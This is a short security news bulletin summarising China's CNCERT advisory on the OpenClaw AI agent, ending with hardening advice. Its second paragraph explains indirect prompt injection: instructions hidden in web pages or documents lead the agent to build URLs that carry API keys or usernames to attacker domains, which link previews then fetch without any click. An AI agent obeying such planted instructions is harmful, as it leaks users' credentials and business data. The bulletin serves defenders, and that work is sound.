148/69 Monday, March 16, 2026
China’s CNCERT has issued an urgent security advisory regarding OpenClaw (formerly known as Clawdbot). The warning highlights that the platform’s weak default security configurations, combined with high-level system permissions granted to the AI agent, may create serious risks. These permissions allow the AI to perform tasks on behalf of users, but they also open opportunities for attackers to compromise endpoints if the system is manipulated. Such attacks could lead to the exposure of confidential business data and passwords, posing significant risks to critical sectors such as finance and energy.
The most concerning attack method identified is Indirect Prompt Injection (IDPI). In this technique, attackers embed malicious instructions within web pages or documents that the AI agent may access. When a user asks the AI to summarize or analyze such content, the AI may unknowingly generate URLs containing sensitive user information, such as API keys or usernames, and transmit them to attacker-controlled domains. The risk becomes even more severe when the AI is used within applications that automatically generate link previews, such as Telegram or Discord. In such cases, sensitive data may be transmitted automatically when the AI generates the response, even if the user never clicks the link.
Additionally, researchers have discovered malicious installers disguised as OpenClaw packages on GitHub, along with deceptive prompts encouraging users to install dangerous add-on modules. Due to these risks, the use of OpenClaw has reportedly been banned in Chinese government agencies and state-owned enterprises. Security experts recommend that users restrict management ports from public internet access, deploy the service within isolated containerized environments, and only download add-ons from trusted sources. It is also advised to disable automatic updates for extensions to prevent attackers from introducing malicious code through compromised updates.
Source https://thehackernews.com/2026/03/openclaw-ai-agent-flaws-could-enable.html